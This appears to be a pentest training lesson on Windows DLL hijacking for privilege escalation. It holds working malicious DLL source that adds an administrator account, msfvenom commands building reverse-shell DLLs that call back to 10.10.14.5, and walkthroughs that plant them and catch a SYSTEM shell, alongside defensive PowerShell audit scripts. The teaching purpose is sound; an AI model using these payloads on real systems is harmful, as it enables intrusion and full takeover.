DLL Hijacking

intermediate · 35 min · Writeup

Exploiting DLL search order for privilege escalation

Learning Objectives

  • Understand DLL search order
  • Find DLL hijacking opportunities
  • Create malicious DLLs
  • Exploit DLL hijacking

DLL Hijacking exploits the way Windows searches for Dynamic Link Libraries (DLLs). When an application loads a DLL, Windows searches specific directories in a defined order. If we can place a malicious DLL earlier in the search path, our code runs instead of the legitimate library.

Think of it like a road detour. The application expects to find its library at the usual location, but we've set up a fake "library" earlier on the route. The application picks up our fake, thinking it's the real thing.

Service vs Application DLL Hijacking

Hijacking a DLL loaded by a SYSTEM service = SYSTEM privileges. Hijacking a DLL loaded by a user application = that user's privileges. Focus on services for privilege escalation.

DLL Search Order

```text
Windows DLL Search Order (SafeDllSearchMode enabled):
1. Application's directory (where the .exe lives)
2. System directory (C:\Windows\System32)
3. 16-bit system directory (C:\Windows\System)
4. Windows directory (C:\Windows)
5. Current working directory
6. Directories in the PATH environment variable

SafeDllSearchMode DISABLED (less common):
1. Application's directory
2. Current working directory  ← Moved earlier!
3. System directory
4. 16-bit system directory
5. Windows directory
6. PATH directories

Known DLLs (bypass search order):
Some DLLs are pre-loaded and bypass this search
Listed in: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
```
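The audit below is an added example and is not code from this writeup or from any tool it names. It reads SafeDllSearchMode from the same Session Manager registry key that holds KnownDLLs, builds the search order for one executable in exactly the order listed above, checks whether the DLL name is a KnownDLL (in which case the search order never applies), and flags each directory that a standard-user principal can write to, which is the condition the rest of the page looks for. The target path C:\VulnApp\service.exe and the DLL name are hypothetical, and the function and parameter names are my own.

```powershell
# Added example (not from the writeup): reconstruct the DLL search order for one
# executable and flag search locations a standard user can write to.
# C:\VulnApp\service.exe and missing.dll are hypothetical values.

$SessionManagerKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'

function Get-DllSearchOrder {
    param([Parameter(Mandatory)][string]$ExePath)

    # SafeDllSearchMode is enabled unless the value exists and is explicitly 0.
    $value = (Get-ItemProperty -Path $SessionManagerKey -Name SafeDllSearchMode -ErrorAction SilentlyContinue).SafeDllSearchMode
    $safe = ($null -eq $value) -or ($value -ne 0)

    $appDir   = Split-Path -Parent $ExePath
    $windir   = $env:SystemRoot
    $system32 = Join-Path $windir 'System32'
    $system16 = Join-Path $windir 'System'
    $cwd      = (Get-Location).ProviderPath
    $pathDirs = @($env:PATH -split ';' | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') })

    # Only the position of the current working directory differs between the two modes.
    if ($safe) { $order = @($appDir, $system32, $system16, $windir, $cwd) }
    else       { $order = @($appDir, $cwd, $system32, $system16, $windir) }
    return $order + $pathDirs
}

function Get-KnownDllNames {
    # DllDirectory/DllDirectory32 hold paths; every other value names a known DLL.
    $key = Get-ItemProperty -Path "$SessionManagerKey\KnownDLLs"
    $key.PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and $_.Name -notlike 'DllDirectory*' } |
        ForEach-Object { $_.Value }
}

function Test-StandardUserWritable {
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $acl = Get-Acl -LiteralPath $Directory -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }

    # Principals every standard user belongs to. Generic rights show up in Get-Acl
    # as raw numbers (for example 268435456) and are not matched by this regex;
    # Deny ACEs are also ignored. Treat a hit as a lead to confirm with icacls.
    $lowPriv     = '^(BUILTIN\\Users|Everyone|NT AUTHORITY\\Authenticated Users|NT AUTHORITY\\INTERACTIVE)$'
    $writeRights = 'Write|Modify|FullControl|CreateFiles|AppendData'
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $ace.IdentityReference.Value -match $lowPriv -and
            $ace.FileSystemRights.ToString() -match $writeRights) {
            return $true
        }
    }
    return $false
}

function Show-DllSearchAudit {
    param([string]$ExePath = 'C:\VulnApp\service.exe',   # hypothetical target binary
          [string]$DllName = 'missing.dll')               # hypothetical DLL name
    if ((Get-KnownDllNames) -contains $DllName) {
        Write-Warning "$DllName is a KnownDLL and is mapped from System32 regardless of search order."
    }
    $i = 0
    foreach ($dir in Get-DllSearchOrder -ExePath $ExePath) {
        $i++
        [pscustomobject]@{
            Order     = $i
            Directory = $dir
            Exists    = Test-Path -LiteralPath $dir -PathType Container
            HasDll    = Test-Path -LiteralPath (Join-Path $dir $DllName) -PathType Leaf
            Writable  = Test-StandardUserWritable -Directory $dir
        }
    }
}

Show-DllSearchAudit | Format-Table -AutoSize
```

Read the table top to bottom: the first row with HasDll set is where the loader resolves the DLL, and any row above it with Writable set is a directory where a standard user could plant a copy that wins the search. A DLL that is missing everywhere (no HasDll row at all) is the "missing DLL" case, and every Writable row is then relevant.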

Why DLL Hijacking Works

```text
Vulnerable Conditions:
├── Application tries to load a DLL
├── DLL is NOT in KnownDLLs list
├── One of these is true:
│   ├── DLL doesn't exist (missing DLL)
│   ├── Earlier search location is writable
│   └── Application directory is writable
└── We can place our DLL before the real one

Common Scenarios:
├── Missing DLL (application expects DLL that was never installed)
├── Phantom DLL (old software references removed DLLs)
├── PATH hijacking (writable directory in PATH before System32)
└── Application folder writable (third-party software)
```

Finding DLL Hijacking Opportunities

Using Process Monitor

```text
Process Monitor (procmon.exe) from Sysinternals:
1. Run as Administrator
2. Set filters:
   - Operation: CreateFile
   - Result: NAME NOT FOUND
   - Path: ends with .dll
3. Start service or application
4. Watch for DLL load failures in writable locations

Filter configuration:
├── Column: Operation
├── Relation: is
├── Value: CreateFile
└── Action: Include

├── Column: Result
├── Relation: is
├── Value: NAME NOT FOUND
└── Action: Include

├── Column: Path
├── Relation: ends with
├── Value: .dll
└── Action: Include
```
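Watching the Process Monitor window is fine for one service, but a capture across a reboot produces thousands of events. The script below is an added example, not part of the writeup or of Process Monitor, that applies the same three filters to a CSV export (File > Save, CSV format, whose default columns are Time of Day, Process Name, PID, Operation, Path, Result and Detail) and groups the failed DLL probes by directory so that probes under %SystemRoot% sort to the bottom and PATH directories are marked. The CSV rows are constructed for the example; the function name is my own.

```powershell
# Added example (not from the writeup): triage a Process Monitor CSV export for
# DLL probes that failed with NAME NOT FOUND, grouped by probed directory.
# The rows below are constructed sample data in Procmon's CSV column layout.

$ProcmonCsv = @'
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","VulnService.exe","1234","CreateFile","C:\VulnApp\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","VulnService.exe","1234","CreateFile","C:\Windows\System32\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.3","VulnService.exe","1234","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:05.0","python.exe","2222","CreateFile","C:\Python\version.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:05.1","python.exe","2222","CreateFile","C:\Windows\System32\version.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:06.0","python.exe","2222","CreateFile","C:\Users\Public\notes.txt","NAME NOT FOUND","Desired Access: Generic Read"
'@ | ConvertFrom-Csv

function Get-MissingDllProbes {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        [string]$SystemRoot = $env:SystemRoot
    )
    $pathDirs = @($env:PATH -split ';' | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') })

    $Events |
        Where-Object {
            # The same three Procmon filters the text sets by hand.
            $_.Operation -eq 'CreateFile' -and
            $_.Result -eq 'NAME NOT FOUND' -and
            $_.Path -like '*.dll'
        } |
        ForEach-Object {
            [pscustomobject]@{
                Process   = $_.'Process Name'
                Directory = Split-Path -Parent $_.Path
                Dll       = Split-Path -Leaf $_.Path
            }
        } |
        Group-Object Directory, Dll |
        ForEach-Object {
            $dir = $_.Group[0].Directory
            # Probes under %SystemRoot% are expected and System32 is not writable by
            # standard users, so they are marked and sorted last.
            $underWindir = [bool]($SystemRoot -and $dir.StartsWith($SystemRoot, [StringComparison]::OrdinalIgnoreCase))
            [pscustomobject]@{
                Directory   = $dir
                Dll         = $_.Group[0].Dll
                Processes   = ($_.Group.Process | Sort-Object -Unique) -join ', '
                Probes      = $_.Count
                UnderWindir = $underWindir
                InPath      = $pathDirs -contains $dir.TrimEnd('\')
            }
        } |
        Sort-Object UnderWindir, Directory, Dll
}

# Against a real capture: Get-MissingDllProbes -Events (Import-Csv .\Logfile.CSV)
Get-MissingDllProbes -Events $ProcmonCsv | Format-Table -AutoSize
```

On the sample data this yields three candidates: C:\VulnApp\missing.dll and C:\Python\version.dll at the top, and C:\Windows\System32\missing.dll marked UnderWindir. The kernel32.dll and version.dll rows that returned SUCCESS and the .txt probe are dropped. Each remaining Directory still has to be checked for write access (icacls, as in the page's examples) before it counts as a finding.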

Automated Discovery

```powershell
# Using PowerUp (script must be dot-sourced or imported by path)
Import-Module .\PowerUp.ps1
Find-ProcessDLLHijack
Find-PathDLLHijack

# WinPEAS checks for DLL hijacking opportunities
.\winpeas.exe servicesinfo

# Check PATH for writable directories
$env:PATH -split ';' | ForEach-Object {
    $path = $_
    $acl = Get-Acl $path -ErrorAction SilentlyContinue
    if ($acl) {
        # Any Allow ACE granting write-class rights to a low-privilege group
        $writable = $acl.Access | Where-Object {
            $_.FileSystemRights -match "Write|FullControl|Modify" -and
            $_.IdentityReference -match "Users|Everyone|Authenticated"
        }
        if ($writable) {
            Write-Host "Writable: $path" -ForegroundColor Red
        }
    }
}
```

Creating Malicious DLLs

```c
// Simple DLL that adds an admin user when loaded
// save as evil.c

#include <windows.h>
#include <stdlib.h>   // system()

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        system("net user hacker Password123! /add");
        system("net localgroup Administrators hacker /add");
    }
    return TRUE;
}

// Compile with MinGW (on Linux):
// x86_64-w64-mingw32-gcc -shared -o evil.dll evil.c

// For 32-bit:
// i686-w64-mingw32-gcc -shared -o evil.dll evil.c
```

Using msfvenom

```bash
# Generate DLL payload (reverse shell)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o evil.dll

# For 32-bit targets
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o evil.dll

# Meterpreter version
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o evil.dll

# Add user (doesn't require listener)
msfvenom -p windows/adduser USER=hacker PASS=Password123! -f dll -o evil.dll
```

Matching Exported Functions

```c
// Some DLLs need to export specific functions
// Check what the application expects:
// dumpbin /exports original.dll

// Example: Application expects MessageBoxA
#include <windows.h>
#include <stdlib.h>   // system()

// Export the expected function (WINAPI keeps the calling convention windows.h declares)
__declspec(dllexport) int WINAPI MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) {
    // Our malicious code runs first
    system("net user hacker Password123! /add");

    // Optionally call the real function (for stealth)
    // LoadLibrary("C:\\Windows\\System32\\user32.dll");
    // return real_MessageBoxA(...);

    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    return TRUE;
}
```

Export Matching

Some applications resolve specific exported functions from the DLL they load. If your DLL doesn't export what's expected, it may not load. Run dumpbin /exports against the original DLL to see which exports are required.

Exploitation Examples

Missing DLL Hijacking

```batch
REM Scenario: Service tries to load missing.dll that doesn't exist
REM Found via Process Monitor or WinPEAS

REM 1. Identify the location the service looks for the DLL
REM Process Monitor shows:
REM   C:\VulnApp\missing.dll - NAME NOT FOUND
REM   C:\Windows\System32\missing.dll - NAME NOT FOUND

REM 2. Check if C:\VulnApp is writable
icacls "C:\VulnApp"
REM   BUILTIN\Users:(M) - YES!

REM 3. Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o missing.dll

REM 4. Place in vulnerable location
copy missing.dll "C:\VulnApp\missing.dll"

REM 5. Start listener
nc -lvnp 4444

REM 6. Restart service (or wait for it to restart)
sc stop VulnService
sc start VulnService

REM 7. Catch SYSTEM shell!
```

PATH DLL Hijacking

```batch
REM Scenario: Writable directory in PATH before System32

REM 1. Check PATH
echo %PATH%
REM   C:\Python;C:\Windows\System32;...

REM 2. Check if C:\Python is writable
icacls C:\Python
REM   BUILTIN\Users:(M) - YES!

REM 3. Find DLLs that applications load from PATH
REM Use Process Monitor or check common DLLs

REM 4. Create malicious DLL with common name
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o version.dll

REM 5. Place in writable PATH directory
copy version.dll C:\Python\version.dll

REM 6. Wait for an application to load it
REM (Many apps load version.dll)
```

Commonly Hijacked DLLs

```text
Commonly Hijacked DLLs:
├── wlbsctrl.dll  ← Used by IKEEXT service
├── wow64log.dll  ← Often missing, loaded by many processes
├── oci.dll       ← Oracle client
├── WTSAPI32.dll  ← Terminal services
├── dwmapi.dll    ← Desktop Window Manager
├── version.dll   ← Many applications
├── userenv.dll   ← User environment
├── faultrep.dll  ← Windows Error Reporting
├── dbghelp.dll   ← Debugging helper
└── dbgcore.dll   ← Debugging core

Finding Your Own Targets:
1. Run Process Monitor
2. Filter for NAME NOT FOUND + .dll
3. Restart various services
4. Note which DLLs are missing from writable locations
5. Target services running as SYSTEM
```
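The list above tells you which services matter (those running as SYSTEM) but not where their binaries live, and the application directory is the first place the loader looks. The script below is an added example, not part of the writeup or of WinPEAS/PowerUp, that enumerates services started as LocalSystem and reports the directory each executable is loaded from, skipping the Windows directory, so that the remaining directories can be checked for write access with icacls as the examples above do. The function name is my own; the PathName parsing handles both quoted and unquoted service command lines.

```powershell
# Added example (not from the writeup): list LocalSystem services whose binary
# lives outside %SystemRoot%, with the directory the loader searches first.

function Get-SystemServiceDirectories {
    $windir = $env:SystemRoot
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
        ForEach-Object {
            # PathName is the raw command line: "C:\Path\svc.exe" -arg or C:\Path\svc.exe -arg
            $cmd = $_.PathName.Trim()
            if ($cmd.StartsWith('"')) {
                $end = $cmd.IndexOf('"', 1)
                $exe = if ($end -gt 1) { $cmd.Substring(1, $end - 1) } else { $cmd.Trim('"') }
            } else {
                # Unquoted: keep everything up to the first .exe so paths with spaces survive
                $m   = [regex]::Match($cmd, '^(.+?\.exe)', 'IgnoreCase')
                $exe = if ($m.Success) { $m.Groups[1].Value } else { ($cmd -split ' ')[0] }
            }
            [pscustomobject]@{
                Service   = $_.Name
                StartMode = $_.StartMode
                State     = $_.State
                Exe       = $exe
                Directory = Split-Path -Parent $exe
            }
        } |
        Where-Object {
            # Binaries under the Windows directory sit in locations standard users cannot write
            $_.Directory -and
            -not $_.Directory.StartsWith($windir, [StringComparison]::OrdinalIgnoreCase)
        } |
        Sort-Object Directory, Service
}

Get-SystemServiceDirectories | Format-Table -AutoSize
```

Each Directory in the output is the "application's directory" for that service and therefore the top of its DLL search order; a service whose Directory grants BUILTIN\Users modify rights, as the icacls output in the examples above shows, is the case the page describes. Services that run as a named account or as LocalService/NetworkService are excluded on purpose, since hijacking them does not yield SYSTEM.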

DLL Hijacking Methodology

DLL Hijacking Attack Flow

1. Monitor: Use Process Monitor to find missing DLLs
2. Identify: Find DLLs searched in writable locations
3. Verify: Confirm directory is writable (icacls)
4. Check Service: Verify service runs as SYSTEM
5. Create DLL: Generate malicious DLL with msfvenom
6. Place: Copy DLL to writable location
7. Trigger: Restart service or wait for load

Knowledge Check

Quick Quiz
Question 1 of 3

What is the first location Windows checks for a DLL (with SafeDllSearchMode enabled)?

Challenges

DLL Hijack Attack

Challenge
💀 advanced

Find a DLL hijacking opportunity on a Windows system and exploit it to gain elevated privileges.


Key Takeaways

  • Windows searches for DLLs in a specific order
  • If we can write to a directory earlier in the order, we win
  • Process Monitor reveals DLL loading behavior
  • Filter for NAME NOT FOUND in writable locations
  • Target services running as SYSTEM for privilege escalation
  • May need to export specific functions to match expectations